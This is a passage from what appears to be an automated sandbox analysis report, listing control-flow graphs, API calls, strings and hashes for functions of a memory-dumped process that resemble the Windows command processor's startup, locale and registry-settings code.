7ff744f1f18e-7ff744f1f198 241->247 248 7ff744f1548c-7ff744f154ae GetLocaleInfoW 242->248 249 7ff744f1f1c4-7ff744f1f1ce 242->249 243->244 250 7ff744f1f120-7ff744f1f12b 243->250 244->237 245->246 251 7ff744f1f163-7ff744f1f16e 245->251 246->241 252 7ff744f1f19a-7ff744f1f1a1 247->252 253 7ff744f1f1b0-7ff744f1f1bb 247->253 254 7ff744f1f207-7ff744f1f20e 248->254 255 7ff744f154b4-7ff744f154f5 setlocale call 7ff744f18f80 248->255 256 7ff744f1f1d1-7ff744f1f1db 249->256 250->238 250->244 251->239 251->246 252->253 258 7ff744f1f1a3-7ff744f1f1ae 252->258 253->249 257 7ff744f1f211-7ff744f1f21b 254->257 260 7ff744f1f1dd-7ff744f1f1e4 256->260 261 7ff744f1f1f3-7ff744f1f1fe 256->261 262 7ff744f1f21d-7ff744f1f224 257->262 263 7ff744f1f233-7ff744f1f23e 257->263 258->247 258->253 260->261 265 7ff744f1f1e6-7ff744f1f1f1 260->265 261->254 262->263 266 7ff744f1f226-7ff744f1f231 262->266 265->256 265->261 266->257 266->263
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InfoLocale$DefaultUsersetlocale
                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                              • API String ID: 1351325837-2236139042
                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction ID: 20321692938c3197c9f5e0751d63a9c4573fe587406562e17cfcfc786ca07f12
                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction Fuzzy Hash: AAF11765B0C642C6EB21BF12E9902B9A6B5BF44B80FD85135CE1D576D8EF3CE905E320
                              Function 00007FF744F15554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 267 7ff744f15554-7ff744f155b9 call 7ff744f1a640 270 7ff744f155bc-7ff744f155e8 RegOpenKeyExW 267->270 271 7ff744f15887-7ff744f1588e 270->271 272 7ff744f155ee-7ff744f15631 RegQueryValueExW 270->272 271->270 273 7ff744f15894-7ff744f158db time srand call 7ff744f18f80 271->273 274 7ff744f1f248-7ff744f1f24d 272->274 275 7ff744f15637-7ff744f15675 RegQueryValueExW 272->275 277 7ff744f1f260-7ff744f1f265 274->277 278 7ff744f1f24f-7ff744f1f25b 274->278 279 7ff744f15677-7ff744f1567c 275->279 280 7ff744f1568e-7ff744f156cc RegQueryValueExW 275->280 277->275 284 7ff744f1f26b-7ff744f1f286 _wtol 277->284 278->275 285 7ff744f1f28b-7ff744f1f290 279->285 286 7ff744f15682-7ff744f15687 279->286 281 7ff744f156d2-7ff744f15710 RegQueryValueExW 280->281 282 7ff744f1f2b6-7ff744f1f2bb 280->282 287 7ff744f15729-7ff744f15767 RegQueryValueExW 281->287 288 7ff744f15712-7ff744f15717 281->288 290 7ff744f1f2ce-7ff744f1f2d3 282->290 291 7ff744f1f2bd-7ff744f1f2c9 282->291 284->275 285->280 289 7ff744f1f296-7ff744f1f2b1 _wtol 285->289 286->280 294 7ff744f15769-7ff744f1576e 287->294 295 7ff744f1579f-7ff744f157dd RegQueryValueExW 287->295 292 7ff744f1f2f9-7ff744f1f2fe 288->292 293 7ff744f1571d-7ff744f15722 288->293 289->280 290->281 296 7ff744f1f2d9-7ff744f1f2f4 _wtol 290->296 291->281 292->287 301 7ff744f1f304-7ff744f1f31a wcstol 292->301 293->287 297 7ff744f1f320-7ff744f1f325 294->297 298 7ff744f15774-7ff744f1578f 294->298 299 7ff744f1f3a9 295->299 300 7ff744f157e3-7ff744f157e8 295->300 296->281 302 7ff744f1f327-7ff744f1f33f wcstol 297->302 303 7ff744f1f34b 297->303 304 7ff744f1f357-7ff744f1f35e 298->304 305 7ff744f15795-7ff744f15799 298->305 308 7ff744f1f3b5-7ff744f1f3b8 299->308 306 7ff744f157ee-7ff744f15809 300->306 307 7ff744f1f363-7ff744f1f368 300->307 301->297 302->303 303->304 304->295 305->295 305->304 311 7ff744f1f39a-7ff744f1f39d 306->311 312 7ff744f1580f-7ff744f15813 306->312 309 7ff744f1f36a-7ff744f1f382 wcstol 307->309 310 7ff744f1f38e 307->310 313 7ff744f1582c 308->313 314 7ff744f1f3be-7ff744f1f3c5 308->314 309->310 310->311 311->299 312->311 315 7ff744f15819-7ff744f15823 312->315 316 7ff744f15832-7ff744f15870 RegQueryValueExW 313->316 318 7ff744f1f3ca-7ff744f1f3d1 313->318 314->316 315->308 317 7ff744f15829 315->317 319 7ff744f1f3dd-7ff744f1f3e2 316->319 320 7ff744f15876-7ff744f15882 RegCloseKey 316->320 317->313 318->319 321 7ff744f1f3e4-7ff744f1f412 ExpandEnvironmentStringsW 319->321 322 7ff744f1f433-7ff744f1f439 319->322 320->271 323 7ff744f1f428 321->323 324 7ff744f1f414-7ff744f1f426 call 7ff744f113e0 321->324 322->320 325 7ff744f1f43f-7ff744f1f44c call 7ff744f0b900 322->325 327 7ff744f1f42e 323->327 324->327 325->320 327->322
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpensrandtime
                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                              • API String ID: 145004033-3846321370
                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction ID: e2b496c1e0d5a188fab7f3d922bdf882f674ab859588042ab8809fb3fd741c34
                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction Fuzzy Hash: 7DE1403251D682C6E750BF12E49057AF7A0FB84745F886135EE8E42A9CDF7CE944EB20
                              Function 00007FF744F14D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 331 7ff744f14d5c-7ff744f14e4b InitializeCriticalSection call 7ff744f158e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff744f10580 call 7ff744f14a14 call 7ff744f14ad0 call 7ff744f15554 GetCommandLineW 342 7ff744f14e4d-7ff744f14e54 331->342 342->342 343 7ff744f14e56-7ff744f14e61 342->343 344 7ff744f14e67-7ff744f14e7b call 7ff744f12e44 343->344 345 7ff744f151cf-7ff744f151e3 call 7ff744f03278 call 7ff744f14c1c 343->345 351 7ff744f151ba-7ff744f151ce call 7ff744f03278 call 7ff744f14c1c 344->351 352 7ff744f14e81-7ff744f14ec3 GetCommandLineW call 7ff744f113e0 call 7ff744f0ca40 344->352 351->345 352->351 362 7ff744f14ec9-7ff744f14ee8 call 7ff744f1417c call 7ff744f12394 352->362 366 7ff744f14eed-7ff744f14ef5 362->366 366->366 367 7ff744f14ef7-7ff744f14f1f call 7ff744f0aa54 366->367 370 7ff744f14f21-7ff744f14f30 367->370 371 7ff744f14f95-7ff744f14fee GetConsoleOutputCP GetCPInfo call 7ff744f151ec GetProcessHeap HeapAlloc 367->371 370->371 373 7ff744f14f32-7ff744f14f39 370->373 376 7ff744f14ff0-7ff744f15006 GetConsoleTitleW 371->376 377 7ff744f15012-7ff744f15018 371->377 373->371 375 7ff744f14f3b-7ff744f14f77 call 7ff744f03278 GetWindowsDirectoryW 373->375 386 7ff744f14f7d-7ff744f14f90 call 7ff744f13c24 375->386 387 7ff744f151b1-7ff744f151b9 call 7ff744f14c1c 375->387 376->377 379 7ff744f15008-7ff744f1500f 376->379 380 7ff744f1507a-7ff744f1507e 377->380 381 7ff744f1501a-7ff744f15024 call 7ff744f13578 377->381 379->377 383 7ff744f150eb-7ff744f15161 GetModuleHandleW GetProcAddress * 3 380->383 384 7ff744f15080-7ff744f150b3 call 7ff744f2b89c call 7ff744f0586c call 7ff744f03240 call 7ff744f13448 380->384 381->380 397 7ff744f15026-7ff744f15030 381->397 390 7ff744f1516f 383->390 391 7ff744f15163-7ff744f15167 383->391 412 7ff744f150d2-7ff744f150d7 call 7ff744f03278 384->412 413 7ff744f150b5-7ff744f150d0 call 7ff744f13448 * 2 384->413 386->371 387->351 396 7ff744f15172-7ff744f151af free call 7ff744f18f80 390->396 391->390 395 7ff744f15169-7ff744f1516d 391->395 395->390 395->396 401 7ff744f15032-7ff744f15059 GetStdHandle GetConsoleScreenBufferInfo 397->401 402 7ff744f15075 call 7ff744f2cff0 397->402 405 7ff744f15069-7ff744f15073 401->405 406 7ff744f1505b-7ff744f15067 401->406 402->380 405->380 405->402 406->380 416 7ff744f150dc-7ff744f150e6 GlobalFree 412->416 413->416 416->383
                              APIs
                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14D9A
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DBB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DCA
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DE0
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DEE
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E04
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10589
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F1059E
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105AF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F105C5
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105EF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F10605
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10632
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F10647
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                                • Part of subcall function 00007FF744F14AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                                • Part of subcall function 00007FF744F14AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F15554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF744F14E35), ref: 00007FF744F155DA
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15623
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15667
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F156BE
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15702
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E35
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E81
                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F69
                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F95
                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FB0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FC1
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FD8
                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FF8
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15037
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1504B
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150DF
                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150F2
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1510F
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15130
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1514A
                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15175
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                              • API String ID: 1049357271-3021193919
                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction ID: 03d9aaedc08acfec22c322b50f9be0f3f40846986ccbd84b7925b8d74c3fb341
                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction Fuzzy Hash: A4C15D21A0CA42D6EB00BF52A895179E7A0FF89B91FCD9134DD0E477D9DF3CA945A220
                              Function 00007FF744F137D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 509 7ff744f137d8-7ff744f13887 GetCurrentThreadId OpenThread call 7ff744f104f4 HeapSetInformation RegOpenKeyExW 512 7ff744f1e9f8-7ff744f1ea3b RegQueryValueExW RegCloseKey 509->512 513 7ff744f1388d-7ff744f138eb call 7ff744f15920 GetConsoleOutputCP GetCPInfo 509->513 515 7ff744f1ea41-7ff744f1ea59 GetThreadLocale 512->515 513->515 519 7ff744f138f1-7ff744f13913 memset 513->519 517 7ff744f1ea5b-7ff744f1ea67 515->517 518 7ff744f1ea74-7ff744f1ea77 515->518 517->518 522 7ff744f1ea79-7ff744f1ea7d 518->522 523 7ff744f1ea94-7ff744f1ea96 518->523 520 7ff744f13919-7ff744f13935 call 7ff744f14d5c 519->520 521 7ff744f1eaa5 519->521 530 7ff744f1393b-7ff744f13942 520->530 531 7ff744f1eae2-7ff744f1eaff call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 520->531 524 7ff744f1eaa8-7ff744f1eab4 521->524 522->523 526 7ff744f1ea7f-7ff744f1ea89 522->526 523->521 524->520 527 7ff744f1eaba-7ff744f1eac3 524->527 526->523 529 7ff744f1eacb-7ff744f1eace 527->529 534 7ff744f1ead0-7ff744f1eadb 529->534 535 7ff744f1eac5-7ff744f1eac9 529->535 532 7ff744f1eb27-7ff744f1eb40 _setjmp 530->532 533 7ff744f13948-7ff744f13962 _setjmp 530->533 538 7ff744f1eb00-7ff744f1eb0d 531->538 539 7ff744f139fe-7ff744f13a05 call 7ff744f14c1c 532->539 540 7ff744f1eb46-7ff744f1eb49 532->540 537 7ff744f13968-7ff744f1396d 533->537 533->538 534->524 541 7ff744f1eadd 534->541 535->529 543 7ff744f139b9-7ff744f139bb 537->543 544 7ff744f1396f 537->544 551 7ff744f1eb15-7ff744f1eb1f call 7ff744f14c1c 538->551 539->512 546 7ff744f1eb4b-7ff744f1eb65 call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 540->546 547 7ff744f1eb66-7ff744f1eb6f call 7ff744f101b8 540->547 541->520 554 7ff744f1eb20 543->554 555 7ff744f139c1-7ff744f139c3 call 7ff744f14c1c 543->555 550 7ff744f13972-7ff744f1397d 544->550 546->547 565 7ff744f1eb87-7ff744f1eb89 call 7ff744f186f0 547->565 566 7ff744f1eb71-7ff744f1eb82 _setmode 547->566 558 7ff744f139c9-7ff744f139de call 7ff744f0df60 550->558 559 7ff744f1397f-7ff744f13984 550->559 551->554 554->532 570 7ff744f139c8 555->570 558->551 576 7ff744f139e4-7ff744f139e8 558->576 559->550 567 7ff744f13986-7ff744f139ae call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 559->567 577 7ff744f1eb8e-7ff744f1ebad call 7ff744f158e4 call 7ff744f0df60 565->577 566->565 586 7ff744f139b3 567->586 570->558 576->539 580 7ff744f139ea-7ff744f139ef call 7ff744f0be00 576->580 590 7ff744f1ebaf-7ff744f1ebb3 577->590 587 7ff744f139f4-7ff744f139fc 580->587 586->543 587->559 590->539 591 7ff744f1ebb9-7ff744f1ec24 call 7ff744f158e4 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 call 7ff744f0be00 call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 590->591 591->577
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                              • API String ID: 2624720099-1920437939
                              • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction ID: d4c3b875bc8dc8eb9766b6721dfbb8eee31440c9fe925ca5db71a0a561b87f74
                              • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction Fuzzy Hash: F1C19E31E0C642CAF714BF6294C55B8EAB1EF49754FCC4139DE4E46ADADE3CA840A720
                              Function 00007FF744F12978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                              Download Yara Rule

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction ID: 4d23921d3bf5de036b7fae4249e554dbe89634a06411fb7383989b1f66660b30
                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction Fuzzy Hash: 78510A21B0C681C5EB30BF57A5842BAE6A0FB54BA0FCD4231DE6D576D8DF3CE845A210
                              Function 00007FF744F07D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00007FF744F07DA1
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F07EB7
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                              • String ID:
                              • API String ID: 168394030-0
                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction ID: ff0c229c50df02746e2f8114fbc4ecde33d7ca79c5c88c924c1824253a8cdb6a
                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction Fuzzy Hash: DAA1D321B1CA42C5FB64FF2798942B9A2A1AF84784FCC4135DE1E476EDDF3CA945A310
                              Function 00007FF744F13C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
